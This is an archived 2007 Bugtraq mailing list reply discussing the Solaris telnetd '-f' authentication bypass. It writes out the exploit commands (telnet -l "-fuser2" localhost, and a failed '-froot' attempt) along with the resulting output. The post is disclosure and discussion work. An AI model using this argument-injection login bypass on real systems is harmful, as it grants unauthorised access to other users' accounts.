| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <200702141141.17801.leandro.gelasi@tiscali.it> Date: Wed, 14 Feb 2007 11:41:17 +0100 From: Leandro Gelasi <leandro.gelasi@...cali.it> To: bugtraq@...urityfocus.com Subject: Re: Solaris telnet vulnberability - how many on your network? On Monday 12 February 2007 07:00, Gadi Evron wrote: > Update from HD Moore: > "but this bug isnt -froot, its -fanythingbutroot =P" Confirmed. If the server permits logins from outside (maybe via SSH only - protection provided by a local or network) and has telnetd enabled any user can login as other user with no password. I mean: $> ssh user1@...10_server.dom password: ******** user1@...10_server>telnet -l "-fuser2" localhost <no pass required> user2@...10_server> On my Solaris 10 server I wasn't able to obtain root privileges this way, trying: $>telnet -l "-froot" localhost (or IP from the local net) I got: Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Not on system console Connection to localhost closed by foreign host. It seems that root cannot login on not-system consoles. This server hosts SunRay Server Software 3.1, maybe the different configuration is coming from there. See you LG -- ************************************************************************** Leandro Gelasi email : leandro.gelasi@...cali.it Gilles Villeneuve will live forever **************************************************************************
Powered by blists - more mailing lists